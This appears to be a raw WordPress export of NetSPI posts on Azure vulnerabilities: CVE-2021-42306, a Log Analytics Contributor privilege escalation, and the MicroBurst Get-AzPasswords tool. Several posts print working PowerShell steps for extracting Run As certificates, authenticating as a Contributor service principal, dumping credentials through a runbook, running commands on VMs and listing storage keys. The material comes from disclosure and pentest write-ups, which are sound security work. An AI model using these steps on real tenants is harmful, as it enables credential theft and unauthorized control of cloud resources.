An exploit of the CVE-2021-42306 vulnerability could give an attacker Azure Contributor role rights, with the ability to "create, manage, and delete all types of resources in the affected Azure subscription," NetSPI explained. An attacker would have access to "all of the resources in the affected subscriptions," including "credentials stored in key vaults."

NetSPI's report on the vulnerability, written by Karl Fosaaen, NetSPI's practice director, described the response by the MSRC as "one of the fastest" he's seen. Fosaaen had initially sent his report to the MSRC on Oct. 7, 2021.

Fosaaen advised following MSRC's advice, but added a cautionary note.

"Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account 'Run as' certificates," he wrote. "Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised." 

Microsoft offers a script from this GitHub page that will check for affected apps, as noted by Microsoft Program Manager Merill Fernando in this Twitter post.

[post_title] => Redmond: Microsoft Fixes Azure Active Directory Issue Exposing Private Key Data [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => redmond-microsoft-fixes-azure-active-directory-issue-exposing-private-key-data [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26728 [menu_order] => 339 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 26730 [post_author] => 10 [post_date] => 2021-11-18 15:19:00 [post_date_gmt] => 2021-11-18 21:19:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Octavio Mares for Information Security Newspaper. Read the full article below or online here.

This week, Microsoft reported the detection of a sensitive information leak vulnerability that affects many Azure Active Directory (AD) deployments. The flaw was tracked as CVE-2021-42306 and received a score of 8.1/10 according to the Common Vulnerability Scoring System (CVSS).

According to the report, incorrect configuration in Azure allows “Run As” credentials in the automation account to be stored in plain text, so any user with access to application registration information could access this information, including threat actors.

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

The flaw was identified by researchers at cybersecurity firm NetSPI, who mention that an attacker could exploit this condition to perform privilege escalation on any affected implementation. The risk is also present for credentials stored in key vaults and any information stored in Azure services, experts say.

Apparently, the flaw is related to the keyCredentials property, designed to configure authentication credentials for applications. Microsoft said: “Some Microsoft services incorrectly store private key data in keyCredentials while building applications on behalf of their customers. At the moment there is no evidence of malicious access to this data.”

The company notes that the vulnerability was fixed by preventing Azure services from storing private keys in plain text in keyCredentials, as well as preventing users from accessing any private key data incorrectly stored in this format: “Private keys in keyCredentials are inaccessible, which mitigates the risk associated with storing this information,” Microsoft concludes.

Microsoft also mentions that all Automation Run As accounts that were created with Azure Automation certificates between October 15, 2020 and October 15, 2021 are affected by this flaw. Azure Migrate services and customers who deployed VMware preview in the Azure disaster recovery experience with Azure Site Recovery (ASR) could also be vulnerable.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

[post_title] => Information Security Newspaper: Very Critical Information Disclosure Vulnerability in Azure Active Directory (AD). Patch Immediately [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => information-security-newspaper-very-critical-information-disclosure-vulnerability-in-azure-active-directory-ad-patch-immediately [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26730 [menu_order] => 340 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 26710 [post_author] => 10 [post_date] => 2021-11-18 14:34:36 [post_date_gmt] => 2021-11-18 20:34:36 [post_content] =>

On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. Read the full article below or online here.

A critical Azure Active Directory vulnerability (CVE-2021-42306) left user credentials stored in easily accessible plain text – a bug that could have let attackers make themselves a contributor to the affected Azure AD subscription, creating, managing and deleting resources across the cloud-based IAM service; which, abused, hands a potentially terrifying amount of control to any bad actor who’s gained access.

The Azure Active Directory vulnerability resulted in private key data being stored in plaintext by four key Azure services in the keyCredentials property of an Azure AD application. (The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata, Microsoft noted in its write-up.)

Azure Automation, Azure Migrate, Azure Site Recovery and Azure applications and Service Principals were all storing their private keys visibly in the public property, Microsoft admitted.

“Automation Account ‘Run as’ credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users)” said attack surface management specialist NetSPI.

The bug was spotted and reported by security firm NetSPI’s practice director Karl Fosaaen.

(His technically detailed write-up can be seen here.)

Microsoft gave it a CVSS score of 8.1 and patched it on November 17 in an out-of-band security update.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

Impacted Azure services have now deployed updates that prevent clear text private key data from being stored during application creation, and Azure AD deployed an update that prevents access to private key data that has previously been stored. NetSPI’s Fosaaen warned however that “although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account ‘Run as’ certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.”

There’s no evidence that the bug has been publicly exploited and it would require basic authorisation, but for a motivated attacker it would have represented a significant weapon in their cloud-exploitation arsenal and raises questions about QA at Microsoft given the critical nature of the exposure.

Microsoft described the Azure Active Directory vulnerability in its security update as “an information disclosure vulnerability [that] manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal….

“This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application,” it added.

In a separate blog by Microsoft Security Response Center the company noted that “access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal” — something illustrated and automated by NetSPI’s Karl Fosaaen.

It’s not Azure’s first serious security issue this year: security researchers at Israel’s Wiz in August 2021 found a critical vulnerability in its flagship CosmosDB database that gave them full admin access for major Microsoft customers including several Fortune 500 multinationals. They warned at the time that the “series of flaws in a Cosmos DB feature created a loophole allowing any user to download, delete or manipulate a massive collection of commercial databases, as well as read/write access to the underlying architecture of Cosmos DB.”

[post_title] => The Stack: “Keys to the cloud” stored in plain text in Azure AD in major hyperscaler blooper [post_excerpt] => On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-stack-keys-to-the-cloud-stored-in-plain-text-in-azure-ad-in-major-hyperscaler-blooper [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26710 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 26684 [post_author] => 10 [post_date] => 2021-11-17 14:13:03 [post_date_gmt] => 2021-11-17 20:13:03 [post_content] =>

Introduction

Occasionally, we find something in an environment that just looks off. It’s not always abundantly clear why it looks wrong, but it is clear that a deeper understanding is required. This was the case when we saw Base64 certificate data (“MII…” strings) stored within App Registration “manifests” in Azure Active Directory.

In this blog, we will share the technical details on how we found and reported CVE-2021-42306 (CredManifest) to Microsoft. In addition to Microsoft’s remediation guidance, we’ll explain the remediation steps organizations can take to protect their Azure environments.

So, what does this mean for your organization? Read our press release to explore the business impact of the issue.

TL;DR

Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users). These credentials could then be used to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

The Source of the Issue

This issue stems from the way the Automation Account “Run as” credentials are created when a new Automation Account is created in Azure. There appears to have been logic on the Azure side that stored the full PFX file in the App Registration manifest, rather than just the associated public key.

We can see this by creating a new Automation Account with a “Run as” account in our test tenant. As an integrated part of this process, we are assigning the Contributor role to the “Run as” account, so we will need to use an account with the Owner role to complete this step. We will use the “BlogExample” Automation Account as our example:

Add Automation Account

Note that we are also setting the “Create Azure Run As account” option to “Yes” for this example. This will create a new service principal account that the Automation Account can use when running scripts. By default, this service principal will also be granted the Contributor role on the subscription that the Automation Account is created in.

We’ve previously covered Automation Accounts on the NetSPI technical blog, so hopefully this is all a refresher. For additional information on Azure Automation Accounts, read:

New Azure Run As account (service principal) created

Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

The “value” parameter is the Base64 encoded string containing the PFX certificate file that can be used for authentication. Before we can authenticate as the App Registration, we will need to convert the Base64 string back into a PFX file.

Manual Extraction of the Credentials

For the proof of concept, we will copy the certificate data out of the manifest and convert it to a PFX file.

This can be done with two lines of PowerShell:

$testcred = "MIIJ/QIBAzCCC[Truncated]="

[IO.File]::WriteAllBytes("$PWD\BlogCert.pfx",[Convert]::FromBase64String($testcred))

This will decode the certificate data to BlogCert.pfx in your current directory.

Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session):

Import-PfxCertificate -FilePath "$PWD\BlogCert.pfx" -CertStoreLocation Cert:\LocalMachine\My

Finally, we can use the newly installed certificate to authenticate to the Azure subscription as the App Registration. This will require us to know the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint for the App Registration credentials. These can be found in the “Overview” menu for the App Registration and the Manifest. 

In this example, we’ve cast these values to PowerShell variables ($thumbprint, $tenantID, $appId).
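
As a hypothetical illustration (the GUIDs and thumbprint below are placeholders, not values from this engagement), those assignments might look like:

```powershell
# Placeholder values for illustration only - pull the real ones from the
# App Registration's "Overview" menu and its Manifest
$tenantID   = "00000000-0000-0000-0000-000000000000"          # Directory (Tenant) ID
$appId      = "11111111-1111-1111-1111-111111111111"          # App (Client) ID
$thumbprint = "0123456789ABCDEF0123456789ABCDEF01234567"      # Certificate thumbprint
```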

With these values available, we can then run the Add-AzAccount command to authenticate to the tenant. 

Add-AzAccount -ServicePrincipal -Tenant $tenantID -CertificateThumbprint $thumbprint -ApplicationId $appId

As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.

Automating Extraction

Since we’re penetration testers and want to automate all our attacks, we wrote up a script to help identify additional instances of this issue in tenants. The PowerShell script uses the Graph API to gather the manifests from AAD and extract the credentials out to files.

The script itself is simple, but it uses the following logic:

  1. Get a token and query the following endpoint for App Registration information – “https://graph.microsoft.com/v1.0/myorganization/applications/”
  2. For each App Registration, check the “keyCredentials” value for data and write it to a file
  3. Use the Get-PfxData PowerShell function to validate that it’s a PFX file
  4. Delete any non-PFX files and log the display name and ID for affected App Registrations to a file for tracking
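
The published script is the authoritative version, but the logic above can be sketched roughly as follows. This is a minimal approximation, not the released tool; it assumes $token already holds a valid Microsoft Graph access token:

```powershell
# Minimal sketch of the extraction logic (not the published script). Assumes
# $token holds a valid Microsoft Graph access token, e.g.:
#   $token = (Get-AzAccessToken -ResourceUrl "https://graph.microsoft.com").Token
# Pagination (@odata.nextLink) is omitted for brevity.
$headers = @{ Authorization = "Bearer $token" }
$apps = (Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/myorganization/applications/" -Headers $headers).value

foreach ($app in $apps) {
    foreach ($cred in $app.keyCredentials) {
        if ($cred.key) {
            # Write the Base64-decoded credential data to disk
            $file = Join-Path $PWD "$($app.id).pfx"
            [IO.File]::WriteAllBytes($file, [Convert]::FromBase64String($cred.key))
            try {
                # Keep the file only if it parses as PFX data
                Get-PfxData -FilePath $file -ErrorAction Stop | Out-Null
                "$($app.displayName) ($($app.id))" | Out-File -Append "affected.txt"
            }
            catch { Remove-Item $file }
        }
    }
}
```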

Impact

For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration. 

By gaining access to the App Registration credential, my new user could then authenticate to the subscription as the Contributor role for the subscription. This is an impactful privilege escalation, as it would allow any user in this environment to escalate to Contributor of any subscription with an Automation Account.

For additional reference, Microsoft’s documentation for default user permissions indicates that this is expected behavior for all member users in AAD: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/users-default-permissions.

Remediation Steps

Below is a detailed overview of how I remediated the issue in a client environment, prior to Microsoft’s fix:

When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.

One important remediation step to note here is the removal of the previous certificate. If the previous credential has not yet expired it will still be viable for authentication. To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.

Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.

I worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure materials online here.

A representative from MSRC shared the following details with NetSPI regarding the remediation steps taken by Microsoft:

  • Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. 
  • Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. 
  • Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.

Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.  

Summary

This was one of the fastest issues that I’ve seen go through the MSRC pipeline. I really appreciate the quick turnaround and open lines of communication that we had with the MSRC team; they were great to work with on this issue.

Below is the timeline for the vulnerability:

  • 10/07/2021 – Initial report submitted to MSRC
  • 10/08/2021 – MSRC assigns a case number to the submission
  • October of 2021 – Back and forth emails and clarification with MSRC
  • 10/29/2021 – NetSPI confirms initial MSRC remediation
  • 11/17/2021 – Public Disclosure

While this was initially researched in a test environment, this issue was quickly escalated once we identified it in client environments. We want to extend special thanks to the clients that worked with us in identifying the issue in their environment and their willingness to let us do a spot check for an unknown vulnerability.

Looking for an Azure cloud pentesting partner? Connect with NetSPI: https://www.netspi.com/contact-us/

Addendum

NetSPI initially discovered this issue with Automation Account "Run as" certificates. MSRC's blog post details that two additional services were affected: Azure Migrate and Azure Site Recovery. These two services also create App Registrations in Azure Active Directory and were affected by the same issue which caused private keys to be stored in App Manifests. It is also possible that manually created Azure AD applications and Service Principals had private keys stored in the same manner.

We recommend taking the same remediation steps for any service principals associated with these services. Microsoft has published tooling to help identify and remediate the issue in each of these scenarios. Their guides and scripts are available here: https://github.com/microsoft/aad-app-credential-tools

[post_title] => CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory [post_excerpt] => The vulnerability, found by NetSPI’s cloud pentesting practice director, Karl Fosaaen, affects any organization that uses Automation Account "Run as" accounts in Azure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-vulnerability-credmanifest [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:45 [post_modified_gmt] => 2022-12-16 16:51:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26684 [menu_order] => 344 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 26468 [post_author] => 10 [post_date] => 2021-09-14 04:00:29 [post_date_gmt] => 2021-09-14 09:00:29 [post_content] =>

NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:

As companies move more and more of their infrastructure to the cloud, they're forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.

It's no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.

But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.

Going beyond certifications

All of these certs are good ways to demonstrate your skills to your current or potential future employers — they're "a good way to get your foot in the door at a company doing cloud security and they're good for getting past a resume filter," says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren't a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.

"Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform," Fosaaen continues. "Many of the currently available certifications only require people to memorize terminology, so you don't have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you're going the extra level to make sure the candidates really do understand the cloud providers that your organization uses."

Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute's Cloud Penetration Testing course, BHIS's Breaching The Cloud Perimeter, or his own company's Dark Side Ops Training. Concrete training courses like these can be a great complement to the "book learning" of a certification.

To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html

[post_title] => CSO: 8 top cloud security certifications [post_excerpt] => NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-cloud-security-certifications [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:13:50 [post_modified_gmt] => 2023-08-22 14:13:50 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26468 [menu_order] => 360 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based on the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AzPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
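
As a hedged illustration of those two pivots (all resource names below are placeholders, not values from the original engagement): Set-AzVMExtension can push a Custom Script Extension that runs a command on a VM, and Get-AzStorageAccountKey lists a Storage Account's access keys.

```powershell
# Placeholders throughout - substitute real resource group / resource names.

# Run a command on a Windows VM via a Custom Script Extension
Set-AzVMExtension -ResourceGroupName "ExampleRG" -VMName "ExampleVM" `
    -Location "eastus" -Name "ExampleCSE" -Publisher "Microsoft.Compute" `
    -ExtensionType "CustomScriptExtension" -TypeHandlerVersion "1.10" `
    -Settings @{ commandToExecute = "powershell.exe -c whoami" }

# List the access keys for a Storage Account
Get-AzStorageAccountKey -ResourceGroupName "ExampleRG" -Name "examplestorage"
```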

Looking for an Azure pentesting partner? Consider NetSPI.

[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:10 [post_modified_gmt] => 2023-03-16 14:24:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 361 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 26141 [post_author] => 53 [post_date] => 2021-08-13 15:12:35 [post_date_gmt] => 2021-08-13 20:12:35 [post_content] =>
Watch Now

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.

[wonderplugin_video iframe="https://youtu.be/m1xxLZVtSz0" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Azure Pentesting: Extracting All the Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-pentesting-extracting-all-the-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-06-22 20:06:04 [post_modified_gmt] => 2023-06-23 01:06:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=26141 [menu_order] => 52 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 11753 [post_author] => 10 [post_date] => 2020-10-22 07:00:26 [post_date_gmt] => 2020-10-22 07:00:26 [post_content] =>

It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.

For those that just want to jump to information on specific services, here are links to each section:

Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.

AzureRM Versus Az

As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much needed switch, as the AzureRM modules are being replaced by the Az modules.

Along with these updates, I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based on the modules the script was using.

Modules

Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switch over to the newly renamed version "Get-AzPasswords" in the Az folder in MicroBurst.

Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.

I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.

Function Usage

For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.

Step 1. Import the MicroBurst Module

PS C:\MicroBurst> Import-Module .\MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Step 2. Authenticate to the Azure Tenant

PS C:\MicroBurst> Login-AzAccount

Account           SubscriptionName  TenantId                             Environment
-------           ----------------  --------                             -----------
test@example.com  TestSubscription  4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud

Step 3. Gather Passwords

PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE:  Exporting items from testingKeys
VERBOSE:   Getting Key value for the testKey Key
VERBOSE:   Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE:  Profile available for microburst-application
